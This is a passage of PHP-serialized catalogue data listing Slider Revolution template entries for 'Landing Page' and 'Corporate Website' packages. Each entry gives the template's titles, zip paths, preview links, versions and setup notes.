Testimonials\";s:5:\"alias\";s:25:\"landing-page-testimonials\";s:3:\"zip\";s:35:\"packs/landing-page-testimonials.zip\";s:3:\"uid\";s:32:\"a83606e311cd5115422d86f04890cbf1\";s:3:\"img\";s:36:\"landing-page-testimonials/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:342;a:25:{s:2:\"id\";s:3:\"358\";s:5:\"title\";s:27:\"Landing Page Call to Action\";s:5:\"alias\";s:27:\"landing-page-call-to-action\";s:3:\"zip\";s:37:\"packs/landing-page-call-to-action.zip\";s:3:\"uid\";s:32:\"adfb456b27fa7eb6b1415d8f80836f05\";s:3:\"img\";s:38:\"landing-page-call-to-action/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:343;a:25:{s:2:\"id\";s:3:\"359\";s:5:\"title\";s:17:\"Landing Page Help\";s:5:\"alias\";s:17:\"landing-page-help\";s:3:\"zip\";s:27:\"packs/landing-page-help.zip\";s:3:\"uid\";s:32:\"ca502431f9b7f6249d99b02464de2dd7\";s:3:\"img\";s:28:\"landing-page-help/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:344;a:25:{s:2:\"id\";s:3:\"360\";s:5:\"title\";s:19:\"Landing Page Footer\";s:5:\"alias\";s:19:\"landing-page-footer\";s:3:\"zip\";s:29:\"packs/landing-page-footer.zip\";s:3:\"uid\";s:32:\"2a6afc371dbd60cb117f8a0f5d09eac9\";s:3:\"img\";s:30:\"landing-page-footer/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:345;a:25:{s:2:\"id\";s:3:\"361\";s:5:\"title\";s:24:\"Landing Page Price Modal\";s:5:\"alias\";s:24:\"landing-page-price-modal\";s:3:\"zip\";s:34:\"packs/landing-page-price-modal.zip\";s:3:\"uid\";s:32:\"a6c5c0430b46dd4e6e68416964a8c54d\";s:3:\"img\";s:35:\"landing-page-price-modal/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:346;a:25:{s:2:\"id\";s:3:\"371\";s:5:\"title\";s:17:\"Corporate Website\";s:5:\"alias\";s:17:\"corporate-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:25:\"corporate-website-package\";s:3:\"img\";s:30:\"packages/corporate-website.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:173:\"[{\"path\":\"revslider-typewriter-addon\\/revslider-typewriter-addon.php\",\"name\":\"Typewriter AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/typewriter-addon\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:347;a:25:{s:2:\"id\";s:3:\"372\";s:5:\"title\";s:16:\"Corporate Header\";s:5:\"alias\";s:16:\"Corporate-Header\";s:3:\"zip\";s:26:\"packs/Corporate-Header.zip\";s:3:\"uid\";s:32:\"04f868e3812a1681f00ab89580e5d1f8\";s:3:\"img\";s:27:\"Corporate-Header/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:348;a:25:{s:2:\"id\";s:3:\"373\";s:5:\"title\";s:24:\"Corporate Welcome Screen\";s:5:\"alias\";s:24:\"Corporate-Welcome-Screen\";s:3:\"zip\";s:34:\"packs/Corporate-Welcome-Screen.zip\";s:3:\"uid\";s:32:\"052afe98ef819f7ace041dbbdb749639\";s:3:\"img\";s:35:\"Corporate-Welcome-Screen/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:173:\"[{\"path\":\"revslider-typewriter-addon\\/revslider-typewriter-addon.php\",\"name\":\"Typewriter AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/typewriter-addon\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:349;a:25:{s:2:\"id\";s:3:\"374\";s:5:\"title\";s:15:\"Corporate About\";s:5:\"alias\";s:15:\"Corporate-About\";s:3:\"zip\";s:25:\"packs/Corporate-About.zip\";s:3:\"uid\";s:32:\"7bf5f8f6d4cc3016cea86289cb46e5b6\";s:3:\"img\";s:26:\"Corporate-About/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:350;a:25:{s:2:\"id\";s:3:\"375\";s:5:\"title\";s:19:\"Corporate Portfolio\";s:5:\"alias\";s:19:\"Corporate-Portfolio\";s:3:\"zip\";s:29:\"packs/Corporate-Portfolio.zip\";s:3:\"uid\";s:32:\"612c2bd784fea81392dda1644a3c3cf3\";s:3:\"img\";s:30:\"Corporate-Portfolio/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:351;a:25:{s:2:\"id\";s:3:\"376\";s:5:\"title\";s:15:\"Corporate Chart\";s:5:\"alias\";s:15:\"Corporate-Chart\";s:3:\"zip\";s:25:\"packs/Corporate-Chart.zip\";s:3:\"uid\";s:32:\"4d27d9b3b2cfcce750e526aafb322a9f\";s:3:\"img\";s:26:\"Corporate-Chart/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:352;a:25:{s:2:\"id\";s:3:\"377\";s:5:\"title\";s:14:\"Corporate News\";s:5:\"alias\";s:14:\"Corporate-News\";s:3:\"zip\";s:24:\"packs/Corporate-News.zip\";s:3:\"uid\";s:32:\"bb65ed57a0d4db795d8b738f0a92f2d7\";s:3:\"img\";s:25:\"Corporate-News/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:353;a:25:{s:2:\"id\";s:3:\"378\";s:5:\"title\";s:16:\"Corporate Hiring\";s:5:\"alias\";s:16:\"Corporate-Hiring\";s:3:\"zip\";s:26:\"packs/Corporate-Hiring.zip\";s:3:\"uid\";s:32:\"136cf1a91604e819089eb3573a6e100a\";s:3:\"img\";s:27:\"Corporate-Hiring/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:354;a:25:{s:2:\"id\";s:3:\"379\";s:5:\"title\";s:22:\"Corporate Testimonials\";s:5:\"alias\";s:22:\"Corporate-Testimonials\";s:3:\"zip\";s:32:\"packs/Corporate-Testimonials.zip\";s:3:\"uid\";s:32:\"b17aec0afdc31e37359cfa406164463c\";s:3:\"img\";s:33:\"Corporate-Testimonials/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:355;a:25:{s:2:\"id\";s:3:\"380\";s:5:\"title\";s:15:\"Corporate Store\";s:5:\"alias\";s:15:\"Corporate-Store\";s:3:\"zip\";s:25:\"packs/Corporate-Store.zip\";s:3:\"uid\";s:32:\"6240b14620ddc634736716e0cdfdeb31\";s:3:\"img\";s:26:\"Corporate-Store/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:356;a:25:{s:2:\"id\";s:3:\"381\";s:5:\"title\";s:17:\"Corporate Support\";s:5:\"alias\";s:17:\"Corporate-Support\";s:3:\"zip\";s:27:\"packs/Corporate-Support.zip\";s:3:\"uid\";s:32:\"9424292a78076ce68c2faf587b26cdad\";s:3:\"img\";s:28:\"Corporate-Support/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"10\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:357;a:25:{s:2:\"id\";s:3:\"382\";s:5:\"title\";s:14:\"Corporate Team\";s:5:\"alias\";s:14:\"Corporate-Team\";s:3:\"zip\";s:24:\"packs/Corporate-Team.zip\";s:3:\"uid\";s:32:\"4fafe469b5a0a2545625c3f6d7ff3b9e\";s:3:\"img\";s:25:\"Corporate-Team/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"11\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:358;a:25:{s:2:\"id\";s:3:\"383\";s:5:\"title\";s:33:\"Corporate Selected Projects Title\";s:5:\"alias\";s:33:\"Corporate-Selected-Projects-Title\";s:3:\"zip\";s:43:\"packs/Corporate-Selected-Projects-Title.zip\";s:3:\"uid\";s:32:\"0ed3c41f51e6bf404c2fe179fa8d8ceb\";s:3:\"img\";s:44:\"Corporate-Selected-Projects-Title/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"12\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:359;a:25:{s:2:\"id\";s:3:\"384\";s:5:\"title\";s:27:\"Corporate Selected 